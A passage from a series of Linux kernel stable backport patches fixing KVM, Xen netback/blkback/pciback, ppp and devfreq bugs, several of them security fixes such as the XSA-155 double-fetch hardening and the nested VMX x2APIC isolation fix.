kvm_mips_invalidate_guest_tlb() - Indicates a change in guest MMU map. + * @vcpu: VCPU with changed mappings. + * @tlb: TLB entry being removed. + * + * This is called to indicate a single change in guest MMU mappings, so that we + * can arrange TLB flushes on this and other CPUs. + */ +static void kvm_mips_invalidate_guest_tlb(struct kvm_vcpu *vcpu, + struct kvm_mips_tlb *tlb) +{ + int cpu, i; + bool user; + + /* No need to flush for entries which are already invalid */ + if (!((tlb->tlb_lo0 | tlb->tlb_lo1) & MIPS3_PG_V)) + return; + /* User address space doesn't need flushing for KSeg2/3 changes */ + user = tlb->tlb_hi < KVM_GUEST_KSEG0; + + preempt_disable(); + + /* + * Probe the shadow host TLB for the entry being overwritten, if one + * matches, invalidate it + */ + kvm_mips_host_tlb_inv(vcpu, tlb->tlb_hi); + + /* Invalidate the whole ASID on other CPUs */ + cpu = smp_processor_id(); + for_each_possible_cpu(i) { + if (i == cpu) + continue; + if (user) + vcpu->arch.guest_user_asid[i] = 0; + vcpu->arch.guest_kernel_asid[i] = 0; + } + + preempt_enable(); +} + /* Write Guest TLB Entry @ Index */ enum emulation_result kvm_mips_emul_tlbwi(struct kvm_vcpu *vcpu) { @@ -331,10 +372,8 @@ enum emulation_result kvm_mips_emul_tlbwi(struct kvm_vcpu *vcpu) } tlb = &vcpu->arch.guest_tlb[index]; -#if 1 - /* Probe the shadow host TLB for the entry being overwritten, if one matches, invalidate it */ - kvm_mips_host_tlb_inv(vcpu, tlb->tlb_hi); -#endif + + kvm_mips_invalidate_guest_tlb(vcpu, tlb); tlb->tlb_mask = kvm_read_c0_guest_pagemask(cop0); tlb->tlb_hi = kvm_read_c0_guest_entryhi(cop0); @@ -373,10 +412,7 @@ enum emulation_result kvm_mips_emul_tlbwr(struct kvm_vcpu *vcpu) tlb = &vcpu->arch.guest_tlb[index]; -#if 1 - /* Probe the shadow host TLB for the entry being overwritten, if one matches, invalidate it */ - kvm_mips_host_tlb_inv(vcpu, tlb->tlb_hi); -#endif + kvm_mips_invalidate_guest_tlb(vcpu, tlb); tlb->tlb_mask = kvm_read_c0_guest_pagemask(cop0); tlb->tlb_hi = kvm_read_c0_guest_entryhi(cop0); @@ -419,6 +455,7 @@ kvm_mips_emulate_CP0(uint32_t inst, uint32_t *opc, uint32_t cause, int32_t rt, rd, copz, sel, co_bit, op; uint32_t pc = vcpu->arch.pc; unsigned long curr_pc; + int cpu, i; /* * Update PC and hold onto current PC in case there is @@ -538,8 +575,16 @@ kvm_mips_emulate_CP0(uint32_t inst, uint32_t *opc, uint32_t cause, ASID_MASK, vcpu->arch.gprs[rt] & ASID_MASK); + preempt_disable(); /* Blow away the shadow host TLBs */ kvm_mips_flush_host_tlb(1); + cpu = smp_processor_id(); + for_each_possible_cpu(i) + if (i != cpu) { + vcpu->arch.guest_user_asid[i] = 0; + vcpu->arch.guest_kernel_asid[i] = 0; + } + preempt_enable(); } kvm_write_c0_guest_entryhi(cop0, vcpu->arch.gprs[rt]); From a0753a8c4a94fb2dfc29d3c8ed6fc3da77826699 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Radim=20Kr=C3=84=C2=8Dm=C3=83=C2=A1=C3=85=C2=99?= Date: Mon, 8 Aug 2016 20:16:23 +0200 Subject: [PATCH 025/315] KVM: nVMX: postpone VMCS changes on MSR_IA32_APICBASE write MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit commit dccbfcf52cebb8963246eba5b177b77f26b34da0 upstream. If vmcs12 does not intercept APIC_BASE writes, then KVM will handle the write with vmcs02 as the current VMCS. This will incorrectly apply modifications intended for vmcs01 to vmcs02 and L2 can use it to gain access to L0's x2APIC registers by disabling virtualized x2APIC while using msr bitmap that assumes enabled. Postpone execution of vmx_set_virtual_x2apic_mode until vmcs01 is the current VMCS. An alternative solution would temporarily make vmcs01 the current VMCS, but it requires more care. Fixes: 8d14695f9542 ("x86, apicv: add virtual x2apic support") Reported-by: Jim Mattson Reviewed-by: Wanpeng Li Signed-off-by: Radim Krčmář Signed-off-by: Willy Tarreau --- arch/x86/kvm/vmx.c | 13 +++++++++++++ 1 file changed, 13 insertions(+) diff --git a/arch/x86/kvm/vmx.c b/arch/x86/kvm/vmx.c index 335fe70967a..7e9ca58ae87 100644 --- a/arch/x86/kvm/vmx.c +++ b/arch/x86/kvm/vmx.c @@ -366,6 +366,7 @@ struct nested_vmx { struct list_head vmcs02_pool; int vmcs02_num; u64 vmcs01_tsc_offset; + bool change_vmcs01_virtual_x2apic_mode; /* L2 must run next, and mustn't decide to exit to L1. */ bool nested_run_pending; /* @@ -6702,6 +6703,12 @@ static void vmx_set_virtual_x2apic_mode(struct kvm_vcpu *vcpu, bool set) { u32 sec_exec_control; + /* Postpone execution until vmcs01 is the current VMCS. */ + if (is_guest_mode(vcpu)) { + to_vmx(vcpu)->nested.change_vmcs01_virtual_x2apic_mode = true; + return; + } + /* * There is not point to enable virtualize x2apic without enable * apicv @@ -8085,6 +8092,12 @@ static void nested_vmx_vmexit(struct kvm_vcpu *vcpu) /* Update TSC_OFFSET if TSC was changed while L2 ran */ vmcs_write64(TSC_OFFSET, vmx->nested.vmcs01_tsc_offset); + if (vmx->nested.change_vmcs01_virtual_x2apic_mode) { + vmx->nested.change_vmcs01_virtual_x2apic_mode = false; + vmx_set_virtual_x2apic_mode(vcpu, + vcpu->arch.apic_base & X2APIC_ENABLE); + } + /* This is needed for same reason as it was needed in prepare_vmcs02 */ vmx->host_rsp = 0; From 010a6cc4a6431093afec6e1611310f9a0f4433fe Mon Sep 17 00:00:00 2001 From: James Hogan Date: Tue, 25 Oct 2016 16:11:11 +0100 Subject: [PATCH 026/315] KVM: MIPS: Make ERET handle ERL before EXL MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit commit ede5f3e7b54a4347be4d8525269eae50902bd7cd upstream. The ERET instruction to return from exception is used for returning from exception level (Status.EXL) and error level (Status.ERL). If both bits are set however we should be returning from ERL first, as ERL can interrupt EXL, for example when an NMI is taken. KVM however checks EXL first. Fix the order of the checks to match the pseudocode in the instruction set manual. Fixes: e685c689f3a8 ("KVM/MIPS32: Privileged instruction/target branch emulation.") Signed-off-by: James Hogan Cc: Paolo Bonzini Cc: "Radim Krčmář" Cc: Ralf Baechle Cc: linux-mips@linux-mips.org Cc: kvm@vger.kernel.org Signed-off-by: Paolo Bonzini Signed-off-by: Willy Tarreau --- arch/mips/kvm/kvm_mips_emul.c | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/arch/mips/kvm/kvm_mips_emul.c b/arch/mips/kvm/kvm_mips_emul.c index 4cfb5bddaa9..716285497e0 100644 --- a/arch/mips/kvm/kvm_mips_emul.c +++ b/arch/mips/kvm/kvm_mips_emul.c @@ -254,15 +254,15 @@ enum emulation_result kvm_mips_emul_eret(struct kvm_vcpu *vcpu) struct mips_coproc *cop0 = vcpu->arch.cop0; enum emulation_result er = EMULATE_DONE; - if (kvm_read_c0_guest_status(cop0) & ST0_EXL) { + if (kvm_read_c0_guest_status(cop0) & ST0_ERL) { + kvm_clear_c0_guest_status(cop0, ST0_ERL); + vcpu->arch.pc = kvm_read_c0_guest_errorepc(cop0); + } else if (kvm_read_c0_guest_status(cop0) & ST0_EXL) { kvm_debug("[%#lx] ERET to %#lx\n", vcpu->arch.pc, kvm_read_c0_guest_epc(cop0)); kvm_clear_c0_guest_status(cop0, ST0_EXL); vcpu->arch.pc = kvm_read_c0_guest_epc(cop0); - } else if (kvm_read_c0_guest_status(cop0) & ST0_ERL) { - kvm_clear_c0_guest_status(cop0, ST0_ERL); - vcpu->arch.pc = kvm_read_c0_guest_errorepc(cop0); } else { printk("[%#lx] ERET when MIPS_SR_EXL|MIPS_SR_ERL == 0\n", vcpu->arch.pc); From a3e49e607d8b858519a83ec65e4aac66ba847f62 Mon Sep 17 00:00:00 2001 From: Ido Yariv Date: Fri, 21 Oct 2016 12:39:57 -0400 Subject: [PATCH 027/315] KVM: x86: fix wbinvd_dirty_mask use-after-free MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit commit bd768e146624cbec7122ed15dead8daa137d909d upstream. vcpu->arch.wbinvd_dirty_mask may still be used after freeing it, corrupting memory. For example, the following call trace may set a bit in an already freed cpu mask: kvm_arch_vcpu_load vcpu_load vmx_free_vcpu_nested vmx_free_vcpu kvm_arch_vcpu_free Fix this by deferring freeing of wbinvd_dirty_mask. Signed-off-by: Ido Yariv Reviewed-by: Paolo Bonzini Signed-off-by: Radim Krčmář Signed-off-by: Willy Tarreau --- arch/x86/kvm/x86.c | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c index 8e57771d4bf..fc68806e6f5 100644 --- a/arch/x86/kvm/x86.c +++ b/arch/x86/kvm/x86.c @@ -6509,11 +6509,13 @@ void kvm_put_guest_fpu(struct kvm_vcpu *vcpu) void kvm_arch_vcpu_free(struct kvm_vcpu *vcpu) { + void *wbinvd_dirty_mask = vcpu->arch.wbinvd_dirty_mask; + kvmclock_reset(vcpu); - free_cpumask_var(vcpu->arch.wbinvd_dirty_mask); fx_free(vcpu); kvm_x86_ops->vcpu_free(vcpu); + free_cpumask_var(wbinvd_dirty_mask); } struct kvm_vcpu *kvm_arch_vcpu_create(struct kvm *kvm, From 014db7f6682a83765c01dc21dadce26a776b1108 Mon Sep 17 00:00:00 2001 From: Paolo Bonzini Date: Thu, 17 Nov 2016 15:55:46 +0100 Subject: [PATCH 028/315] KVM: x86: fix missed SRCU usage in kvm_lapic_set_vapic_addr MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit commit 7301d6abaea926d685832f7e1f0c37dd206b01f4 upstream. Reported by syzkaller: [ INFO: suspicious RCU usage. ] 4.9.0-rc4+ #47 Not tainted ------------------------------- ./include/linux/kvm_host.h:536 suspicious rcu_dereference_check() usage! stack backtrace: CPU: 1 PID: 6679 Comm: syz-executor Not tainted 4.9.0-rc4+ #47 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011 ffff880039e2f6d0 ffffffff81c2e46b ffff88003e3a5b40 0000000000000000 0000000000000001 ffffffff83215600 ffff880039e2f700 ffffffff81334ea9 ffffc9000730b000 0000000000000004 ffff88003c4f8420 ffff88003d3f8000 Call Trace: [< inline >] __dump_stack lib/dump_stack.c:15 [] dump_stack+0xb3/0x118 lib/dump_stack.c:51 [] lockdep_rcu_suspicious+0x139/0x180 kernel/locking/lockdep.c:4445 [< inline >] __kvm_memslots include/linux/kvm_host.h:534 [< inline >] kvm_memslots include/linux/kvm_host.h:541 [] kvm_gfn_to_hva_cache_init+0xa1e/0xce0 virt/kvm/kvm_main.c:1941 [] kvm_lapic_set_vapic_addr+0xed/0x140 arch/x86/kvm/lapic.c:2217 Reported-by: Dmitry Vyukov Fixes: fda4e2e85589191b123d31cdc21fd33ee70f50fd Cc: Andrew Honig Signed-off-by: Paolo Bonzini Reviewed-by: David Hildenbrand Signed-off-by: Radim Krčmář Signed-off-by: Willy Tarreau --- arch/x86/kvm/x86.c | 3 +++ 1 file changed, 3 insertions(+) diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c index fc68806e6f5..1072083ae07 100644 --- a/arch/x86/kvm/x86.c +++ b/arch/x86/kvm/x86.c @@ -3182,6 +3182,7 @@ long kvm_arch_vcpu_ioctl(struct file *filp, }; case KVM_SET_VAPIC_ADDR: { struct kvm_vapic_addr va; + int idx; r = -EINVAL; if (!irqchip_in_kernel(vcpu->kvm)) @@ -3189,7 +3190,9 @@ long kvm_arch_vcpu_ioctl(struct file *filp, r = -EFAULT; if (copy_from_user(&va, argp, sizeof va)) goto out; + idx = srcu_read_lock(&vcpu->kvm->srcu); r = kvm_lapic_set_vapic_addr(vcpu, va.vapic_addr); + srcu_read_unlock(&vcpu->kvm->srcu, idx); break; } case KVM_X86_SETUP_MCE: { From 01c2288236820005b4f5c7c57609e2e087c98a55 Mon Sep 17 00:00:00 2001 From: Ignacio Alvarado Date: Fri, 4 Nov 2016 12:15:55 -0700 Subject: [PATCH 029/315] KVM: Disable irq while unregistering user notifier MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit commit 1650b4ebc99da4c137bfbfc531be4a2405f951dd upstream. Function user_notifier_unregister should be called only once for each registered user notifier. Function kvm_arch_hardware_disable can be executed from an IPI context which could cause a race condition with a VCPU returning to user mode and attempting to unregister the notifier. Signed-off-by: Ignacio Alvarado Fixes: 18863bdd60f8 ("KVM: x86 shared msr infrastructure") Reviewed-by: Paolo Bonzini Signed-off-by: Radim Krčmář Signed-off-by: Willy Tarreau --- arch/x86/kvm/x86.c | 13 +++++++++++-- 1 file changed, 11 insertions(+), 2 deletions(-) diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c index 1072083ae07..b70b67bde90 100644 --- a/arch/x86/kvm/x86.c +++ b/arch/x86/kvm/x86.c @@ -178,7 +178,18 @@ static void kvm_on_user_return(struct user_return_notifier *urn) struct kvm_shared_msrs *locals = container_of(urn, struct kvm_shared_msrs, urn); struct kvm_shared_msr_values *values; + unsigned long flags; + /* + * Disabling irqs at this point since the following code could be + * interrupted and executed through kvm_arch_hardware_disable() + */ + local_irq_save(flags); + if (locals->registered) { + locals->registered = false; + user_return_notifier_unregister(urn); + } + local_irq_restore(flags); for (slot = 0; slot < shared_msrs_global.nr; ++slot) { values = &locals->values[slot]; if (values->host != values->curr) { @@ -186,8 +197,6 @@ static void kvm_on_user_return(struct user_return_notifier *urn) values->curr = values->host; } } - locals->registered = false; - user_return_notifier_unregister(urn); } static void shared_msr_update(unsigned slot, u32 msr) From 6e5ae963b52851a86c038993d167df2a946290cf Mon Sep 17 00:00:00 2001 From: Xiaolong Ye Date: Fri, 11 Sep 2015 11:05:23 +0800 Subject: [PATCH 030/315] PM / devfreq: Fix incorrect type issue. commit 5f25f066f75a67835abb5e400471a27abd09395b upstream time_in_state in struct devfreq is defined as unsigned long, so devm_kzalloc should use sizeof(unsigned long) as argument instead of sizeof(unsigned int), otherwise it will cause unexpected result in 64bit system. Signed-off-by: Xiaolong Ye Signed-off-by: Kevin Liu Signed-off-by: MyungJoo Ham Signed-off-by: Willy Tarreau --- drivers/devfreq/devfreq.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/devfreq/devfreq.c b/drivers/devfreq/devfreq.c index 3b367973a80..d5cbb7c242f 100644 --- a/drivers/devfreq/devfreq.c +++ b/drivers/devfreq/devfreq.c @@ -472,7 +472,7 @@ struct devfreq *devfreq_add_device(struct device *dev, devfreq->profile->max_state * devfreq->profile->max_state, GFP_KERNEL); - devfreq->time_in_state = devm_kzalloc(dev, sizeof(unsigned int) * + devfreq->time_in_state = devm_kzalloc(dev, sizeof(unsigned long) * devfreq->profile->max_state, GFP_KERNEL); devfreq->last_stat_updated = jiffies; From 068b35e923cd27bad171e4031e4963c3c8ee2170 Mon Sep 17 00:00:00 2001 From: WANG Cong Date: Tue, 5 Jul 2016 22:12:36 -0700 Subject: [PATCH 031/315] ppp: defer netns reference release for ppp channel commit 205e1e255c479f3fd77446415706463b282f94e4 upstream Matt reported that we have a NULL pointer dereference in ppp_pernet() from ppp_connect_channel(), i.e. pch->chan_net is NULL. This is due to that a parallel ppp_unregister_channel() could happen while we are in ppp_connect_channel(), during which pch->chan_net set to NULL. Since we need a reference to net per channel, it makes sense to sync the refcnt with the life time of the channel, therefore we should release this reference when we destroy it. Fixes: 1f461dcdd296 ("ppp: take reference on channels netns") Reported-by: Matt Bennett Cc: Paul Mackerras Cc: linux-ppp@vger.kernel.org Cc: Guillaume Nault Cc: Cyrill Gorcunov Signed-off-by: Cong Wang Reviewed-by: Cyrill Gorcunov Signed-off-by: David S. Miller Signed-off-by: Willy Tarreau --- drivers/net/ppp/ppp_generic.c | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/drivers/net/ppp/ppp_generic.c b/drivers/net/ppp/ppp_generic.c index 14a8d295869..ab79c0f13d0 100644 --- a/drivers/net/ppp/ppp_generic.c +++ b/drivers/net/ppp/ppp_generic.c @@ -2317,8 +2317,6 @@ ppp_unregister_channel(struct ppp_channel *chan) spin_lock_bh(&pn->all_channels_lock); list_del(&pch->list); spin_unlock_bh(&pn->all_channels_lock); - put_net(pch->chan_net); - pch->chan_net = NULL; pch->file.dead = 1; wake_up_interruptible(&pch->file.rwait); @@ -2925,6 +2923,9 @@ ppp_disconnect_channel(struct channel *pch) */ static void ppp_destroy_channel(struct channel *pch) { + put_net(pch->chan_net); + pch->chan_net = NULL; + atomic_dec(&channel_count); if (!pch->file.dead) { From 0679df0fff349dd7e8d3d7fb3e162bdf6949c873 Mon Sep 17 00:00:00 2001 From: Jan Beulich Date: Thu, 21 Apr 2016 00:27:04 -0600 Subject: [PATCH 032/315] x86/mm/xen: Suppress hugetlbfs in PV guests commit 103f6112f253017d7062cd74d17f4a514ed4485c upstream. Huge pages are not normally available to PV guests. Not suppressing hugetlbfs use results in an endless loop of page faults when user mode code tries to access a hugetlbfs mapped area (since the hypervisor denies such PTEs to be created, but error indications can't be propagated out of xen_set_pte_at(), just like for various of its siblings), and - once killed in an oops like this: kernel BUG at .../fs/hugetlbfs/inode.c:428! invalid opcode: 0000 [#1] SMP ... RIP: e030:[] [] remove_inode_hugepages+0x25b/0x320 ... Call Trace: [] hugetlbfs_evict_inode+0x15/0x40 [] evict+0xbd/0x1b0 [] __dentry_kill+0x19a/0x1f0 [] dput+0x1fe/0x220 [] __fput+0x155/0x200 [] task_work_run+0x60/0xa0 [] do_exit+0x160/0x400 [] do_group_exit+0x3b/0xa0 [] get_signal+0x1ed/0x470 [] do_signal+0x14/0x110 [] prepare_exit_to_usermode+0xe9/0xf0 [] retint_user+0x8/0x13 This is CVE-2016-3961 / XSA-174. Reported-by: Vitaly Kuznetsov Signed-off-by: Jan Beulich Cc: Andrew Morton Cc: Andy Lutomirski Cc: Boris Ostrovsky Cc: Borislav Petkov Cc: Brian Gerst Cc: David Vrabel Cc: Denys Vlasenko Cc: H. Peter Anvin Cc: Juergen Gross Cc: Linus Torvalds Cc: Luis R. Rodriguez Cc: Peter Zijlstra Cc: Thomas Gleixner Cc: Toshi Kani Cc: xen-devel Link: http://lkml.kernel.org/r/57188ED802000078000E431C@prv-mh.provo.novell.com Signed-off-by: Ingo Molnar Signed-off-by: Willy Tarreau --- arch/x86/include/asm/hugetlb.h | 1 + 1 file changed, 1 insertion(+) diff --git a/arch/x86/include/asm/hugetlb.h b/arch/x86/include/asm/hugetlb.h index 68c05398bba..7aadd3cea84 100644 --- a/arch/x86/include/asm/hugetlb.h +++ b/arch/x86/include/asm/hugetlb.h @@ -4,6 +4,7 @@ #include #include +#define hugepages_supported() cpu_has_pse static inline int is_hugepage_only_range(struct mm_struct *mm, unsigned long addr, From 0a5b4e4cf2486558406280439157e5518a4b088d Mon Sep 17 00:00:00 2001 From: David Vrabel Date: Fri, 30 Oct 2015 14:58:08 +0000 Subject: [PATCH 033/315] xen: Add RING_COPY_REQUEST() commit 454d5d882c7e412b840e3c99010fe81a9862f6fb upstream. Using RING_GET_REQUEST() on a shared ring is easy to use incorrectly (i.e., by not considering that the other end may alter the data in the shared ring while it is being inspected). Safe usage of a request generally requires taking a local copy. Provide a RING_COPY_REQUEST() macro to use instead of RING_GET_REQUEST() and an open-coded memcpy(). This takes care of ensuring that the copy is done correctly regardless of any possible compiler optimizations. Use a volatile source to prevent the compiler from reordering or omitting the copy. This is part of XSA155. Signed-off-by: David Vrabel Signed-off-by: Konrad Rzeszutek Wilk Signed-off-by: Willy Tarreau --- include/xen/interface/io/ring.h | 14 ++++++++++++++ 1 file changed, 14 insertions(+) diff --git a/include/xen/interface/io/ring.h b/include/xen/interface/io/ring.h index 75271b9a8f6..50983a61eba 100644 --- a/include/xen/interface/io/ring.h +++ b/include/xen/interface/io/ring.h @@ -181,6 +181,20 @@ struct __name##_back_ring { \ #define RING_GET_REQUEST(_r, _idx) \ (&((_r)->sring->ring[((_idx) & (RING_SIZE(_r) - 1))].req)) +/* + * Get a local copy of a request. + * + * Use this in preference to RING_GET_REQUEST() so all processing is + * done on a local copy that cannot be modified by the other end. + * + * Note that https://gcc.gnu.org/bugzilla/show_bug.cgi?id=58145 may cause this + * to be ineffective where _req is a struct which consists of only bitfields. + */ +#define RING_COPY_REQUEST(_r, _idx, _req) do { \ + /* Use volatile to force the copy into _req. */ \ + *(_req) = *(volatile typeof(_req))RING_GET_REQUEST(_r, _idx); \ +} while (0) + #define RING_GET_RESPONSE(_r, _idx) \ (&((_r)->sring->ring[((_idx) & (RING_SIZE(_r) - 1))].rsp)) From 85fed7d24f020390aabb1b09e5fecfe5536bfb16 Mon Sep 17 00:00:00 2001 From: David Vrabel Date: Fri, 30 Oct 2015 15:16:01 +0000 Subject: [PATCH 034/315] xen-netback: don't use last request to determine minimum Tx credit commit 0f589967a73f1f30ab4ac4dd9ce0bb399b4d6357 upstream. The last from guest transmitted request gives no indication about the minimum amount of credit that the guest might need to send a packet since the last packet might have been a small one. Instead allow for the worst case 128 KiB packet. This is part of XSA155. Reviewed-by: Wei Liu Signed-off-by: David Vrabel Signed-off-by: Konrad Rzeszutek Wilk Signed-off-by: Willy Tarreau --- drivers/net/xen-netback/netback.c | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/drivers/net/xen-netback/netback.c b/drivers/net/xen-netback/netback.c index 1595f818b8c..3e0907a3f0a 100644 --- a/drivers/net/xen-netback/netback.c +++ b/drivers/net/xen-netback/netback.c @@ -928,9 +928,7 @@ static void tx_add_credit(struct xenvif *vif) * Allow a burst big enough to transmit a jumbo packet of up to 128kB. * Otherwise the interface can seize up due to insufficient credit. */ - max_burst = RING_GET_REQUEST(&vif->tx, vif->tx.req_cons)->size; - max_burst = min(max_burst, 131072UL); - max_burst = max(max_burst, vif->credit_bytes); + max_burst = max(131072UL, vif->credit_bytes); /* Take care that adding a new chunk of credit doesn't wrap to zero. */ max_credit = vif->remaining_credit + vif->credit_bytes; From 67434d33afc97f2f99b8889c110d190dedefda44 Mon Sep 17 00:00:00 2001 From: David Vrabel Date: Fri, 30 Oct 2015 15:17:06 +0000 Subject: [PATCH 035/315] xen-netback: use RING_COPY_REQUEST() throughout commit 68a33bfd8403e4e22847165d149823a2e0e67c9c upstream. Instead of open-coding memcpy()s and directly accessing Tx and Rx requests, use the new RING_COPY_REQUEST() that ensures the local copy is correct. This is more than is strictly necessary for guest Rx requests since only the id and gref fields are used and it is harmless if the frontend modifies these. This is part of XSA155. Reviewed-by: Wei Liu Signed-off-by: David Vrabel Signed-off-by: Konrad Rzeszutek Wilk [wt: adjustments for 3.10 : netbk_rx_meta instead of struct xenvif_rx_meta] Signed-off-by: Willy Tarreau --- drivers/net/xen-netback/netback.c | 30 ++++++++++++++---------------- 1 file changed, 14 insertions(+), 16 deletions(-) diff --git a/drivers/net/xen-netback/netback.c b/drivers/net/xen-netback/netback.c index 3e0907a3f0a..ec88898ce42 100644 --- a/drivers/net/xen-netback/netback.c +++ b/drivers/net/xen-netback/netback.c @@ -454,17 +454,17 @@ static struct netbk_rx_meta *get_next_rx_buffer(struct xenvif *vif, struct netrx_pending_operations *npo) { struct netbk_rx_meta *meta; - struct xen_netif_rx_request *req; + struct xen_netif_rx_request req; - req = RING_GET_REQUEST(&vif->rx, vif->rx.req_cons++); + RING_COPY_REQUEST(&vif->rx, vif->rx.req_cons++, &req); meta = npo->meta + npo->meta_prod++; meta->gso_size = 0; meta->size = 0; - meta->id = req->id; + meta->id = req.id; npo->copy_off = 0; - npo->copy_gref = req->gref; + npo->copy_gref = req.gref; return meta; } @@ -582,7 +582,7 @@ static int netbk_gop_skb(struct sk_buff *skb, struct xenvif *vif = netdev_priv(skb->dev); int nr_frags = skb_shinfo(skb)->nr_frags; int i; - struct xen_netif_rx_request *req; + struct xen_netif_rx_request req; struct netbk_rx_meta *meta; unsigned char *data; int head = 1; @@ -592,14 +592,14 @@ static int netbk_gop_skb(struct sk_buff *skb, /* Set up a GSO prefix descriptor, if necessary */ if (skb_shinfo(skb)->gso_size && vif->gso_prefix) { - req = RING_GET_REQUEST(&vif->rx, vif->rx.req_cons++); + RING_COPY_REQUEST(&vif->rx, vif->rx.req_cons++, &req); meta = npo->meta + npo->meta_prod++; meta->gso_size = skb_shinfo(skb)->gso_size; meta->size = 0; - meta->id = req->id; + meta->id = req.id; } - req = RING_GET_REQUEST(&vif->rx, vif->rx.req_cons++); + RING_COPY_REQUEST(&vif->rx, vif->rx.req_cons++, &req); meta = npo->meta + npo->meta_prod++; if (!vif->gso_prefix) @@ -608,9 +608,9 @@ static int netbk_gop_skb(struct sk_buff *skb, meta->gso_size = 0; meta->size = 0; - meta->id = req->id; + meta->id = req.id; npo->copy_off = 0; - npo->copy_gref = req->gref; + npo->copy_gref = req.gref; data = skb->data; while (data < skb_tail_pointer(skb)) { @@ -954,7 +954,7 @@ static void netbk_tx_err(struct xenvif *vif, make_tx_response(vif, txp, XEN_NETIF_RSP_ERROR); if (cons == end) break; - txp = RING_GET_REQUEST(&vif->tx, cons++); + RING_COPY_REQUEST(&vif->tx, cons++, txp); } while (1); vif->tx.req_cons = cons; xen_netbk_check_rx_xenvif(vif); @@ -1021,8 +1021,7 @@ static int netbk_count_requests(struct xenvif *vif, if (drop_err) txp = &dropped_tx; - memcpy(txp, RING_GET_REQUEST(&vif->tx, cons + slots), - sizeof(*txp)); + RING_COPY_REQUEST(&vif->tx, cons + slots, txp); /* If the guest submitted a frame >= 64 KiB then * first->size overflowed and following slots will @@ -1310,8 +1309,7 @@ static int xen_netbk_get_extras(struct xenvif *vif, return -EBADR; } - memcpy(&extra, RING_GET_REQUEST(&vif->tx, cons), - sizeof(extra)); + RING_COPY_REQUEST(&vif->tx, cons, &extra); if (unlikely(!extra.type || extra.type >= XEN_NETIF_EXTRA_TYPE_MAX)) { vif->tx.req_cons = ++cons; @@ -1501,7 +1499,7 @@ static unsigned xen_netbk_tx_build_gops(struct xen_netbk *netbk) idx = vif->tx.req_cons; rmb(); /* Ensure that we see the request before we copy it. */ - memcpy(&txreq, RING_GET_REQUEST(&vif->tx, idx), sizeof(txreq)); + RING_COPY_REQUEST(&vif->tx, idx, &txreq); /* Credit-based scheduling. */ if (txreq.size > vif->remaining_credit && From d6837064ef1e8d3edca4d4848e12e4e905f4039a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Roger=20Pau=20Monn=C3=A9?= Date: Tue, 3 Nov 2015 16:34:09 +0000 Subject: [PATCH 036/315] xen-blkback: only read request operation from shared ring once MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit commit 1f13d75ccb806260079e0679d55d9253e370ec8a upstream. A compiler may load a switch statement value multiple times, which could be bad when the value is in memory shared with the frontend. When converting a non-native request to a native one, ensure that src->operation is only loaded once by using READ_ONCE(). This is part of XSA155. Signed-off-by: Roger Pau Monné Signed-off-by: David Vrabel Signed-off-by: Konrad Rzeszutek Wilk Cc: "Jan Beulich" [wt: s/READ_ONCE/ACCESS_ONCE for 3.10] Signed-off-by: Willy Tarreau --- drivers/block/xen-blkback/common.h | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/drivers/block/xen-blkback/common.h b/drivers/block/xen-blkback/common.h index 60103e2517b..467cb48fcf3 100644 --- a/drivers/block/xen-blkback/common.h +++ b/drivers/block/xen-blkback/common.h @@ -269,8 +269,8 @@ static inline void blkif_get_x86_32_req(struct blkif_request *dst, struct blkif_x86_32_request *src) { int i, n = BLKIF_MAX_SEGMENTS_PER_REQUEST; - dst->operation = src->operation; - switch (src->operation) { + dst->operation = ACCESS_ONCE(src->operation); + switch (dst->operation) { case BLKIF_OP_READ: case BLKIF_OP_WRITE: case BLKIF_OP_WRITE_BARRIER: @@ -305,8 +305,8 @@ static inline void blkif_get_x86_64_req(struct blkif_request *dst, struct blkif_x86_64_request *src) { int i, n = BLKIF_MAX_SEGMENTS_PER_REQUEST; - dst->operation = src->operation; - switch (src->operation) { + dst->operation = ACCESS_ONCE(src->operation); + switch (dst->operation) { case BLKIF_OP_READ: case BLKIF_OP_WRITE: case BLKIF_OP_WRITE_BARRIER: From ffb6bca6899f85c6c8b1609aeac3e004d18f8071 Mon Sep 17 00:00:00 2001 From: Konrad Rzeszutek Wilk Date: Mon, 16 Nov 2015 12:40:48 -0500 Subject: [PATCH 037/315] xen/pciback: Save xen_pci_op commands before processing it commit 8135cf8b092723dbfcc611fe6fdcb3a36c9951c5 upstream. Double fetch vulnerabilities that happen when a variable is fetched twice from shared memory but a security check is only performed the first time. The xen_pcibk_do_op function performs a switch statements on the op->cmd value which is stored in shared memory. Interestingly this can result in a double fetch vulnerability depending on the performed compiler optimization. This patch fixes it by saving the xen_pci_op command before processing it. We also use 'barrier' to make sure that the compiler does not perform any optimization. This is part of XSA155. Reviewed-by: Konrad Rzeszutek Wilk Signed-off-by: Jan Beulich Signed-off-by: David Vrabel Signed-off-by: Konrad Rzeszutek Wilk Cc: "Jan Beulich" Signed-off-by: Willy Tarreau --- drivers/xen/xen-pciback/pciback.h | 1 + drivers/xen/xen-pciback/pciback_ops.c | 15 ++++++++++++++- 2 files changed, 15 insertions(+), 1 deletion(-) diff --git a/drivers/xen/xen-pciback/pciback.h b/drivers/xen/xen-pciback/pciback.h index f72af87640e..560b3ecbcba 100644 --- a/drivers/xen/xen-pciback/pciback.h +++ b/drivers/xen/xen-pciback/pciback.h @@ -37,6 +37,7 @@ 